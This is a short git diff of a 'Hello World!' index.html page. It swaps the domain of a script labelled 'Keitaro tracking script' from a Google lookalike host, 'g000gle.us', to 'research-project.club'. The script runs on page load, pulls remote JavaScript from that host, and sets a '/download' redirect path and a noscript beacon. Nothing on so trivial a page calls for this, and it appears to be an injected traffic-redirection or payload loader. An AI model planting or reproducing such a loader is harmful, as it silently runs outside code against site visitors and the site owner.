--- a/index.html
+++ b/index.html
@@ -3,10 +3,10 @@
 <head>
 	<!-- Keitaro tracking script -->
 <script type='application/javascript'>
-if (!window.KTracking){window.KTracking={collectNonUniqueClicks: true, multiDomain: false, R_PATH: 'https://g000gle.us/download', P_PATH:'https://g000gle.us/2708d3a/postback', listeners: [], reportConversion: function(){this.queued = arguments;}, getSubId: function(fn) {this.listeners.push(fn);}, ready: function(fn) {this.listeners.push(fn);} };}(function(){var a=document.createElement('script');a.type='application/javascript';a.async=true;a.src='https://g000gle.us/js/k.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(a,s)})();
-</script><noscript><img height='0' width='0' alt='' src='https://g000gle.us/download'/></noscript>
-	
-  <meta charset="utf-8">
+if (!window.KTracking){window.KTracking={collectNonUniqueClicks: true, multiDomain: false, R_PATH: 'https://research-project.club/mJmXdc', P_PATH:'https://research-project.club/2708d3a/postback', listeners: [], reportConversion: function(){this.queued = arguments;}, getSubId: function(fn) {this.listeners.push(fn);}, ready: function(fn) {this.listeners.push(fn);} };}(function(){var a=document.createElement('script');a.type='application/javascript';a.async=true;a.src='https://research-project.club/js/k.min.js';var s=document.getElementsByTagName('script')[0];s.parentNode.insertBefore(a,s)})();
+</script><noscript><img height='0' width='0' alt='' src='https://research-project.club/mJmXdc'/></noscript>
+ 
+	<meta charset="utf-8">
   <title>Hello World!</title>
 
 </head>
